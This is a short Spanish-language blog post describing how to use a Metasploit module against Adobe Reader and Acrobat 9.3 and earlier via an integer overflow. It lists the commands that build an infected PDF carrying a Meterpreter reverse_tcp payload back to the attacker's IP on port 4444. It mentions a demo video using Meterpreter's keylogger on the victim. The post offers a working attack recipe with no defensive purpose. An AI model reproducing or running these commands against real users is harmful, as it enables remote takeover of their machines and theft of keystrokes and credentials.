Publicado Por
Unknown
//
10:16
//
7 ago 2013
Adobe Reader 9.3 y versiones anteriores para Windows, Macintosh y UNIX
Adobe Acrobat 9.3 y versiones anteriores para Windows y Macintosh
Probado en Windows XP SP3 con Adobe Reader 9.3.0
Descripción:
Este módulo explota una vulnerabilidad de desbordamiento de enteros en Adobe Reader y Adobe Acrobat versiones Professional 8.0 por 8.2 y 9.0 a 9.3.Hice un video demo como se explota dicho exploit abajo estan los comando que se utilizan en una breve explicación se crea un archivo pdf infectado que afecta las versiones de adobe reader 8,9,9.3 y anteriores para arrancar una sesión de meterpreter y se ve como se utiliza el keylogger que trae el meterpreter.
Descargar video original
Código:
use windows/fileformat/adobe_libtiff
set filename rhinestonehack.pdf
set outputpath /root/Desktop
set payload windows/meterpreter/reverse_tcp
set LHOST (mi ip)
set LPORT 4444
0 comentarios: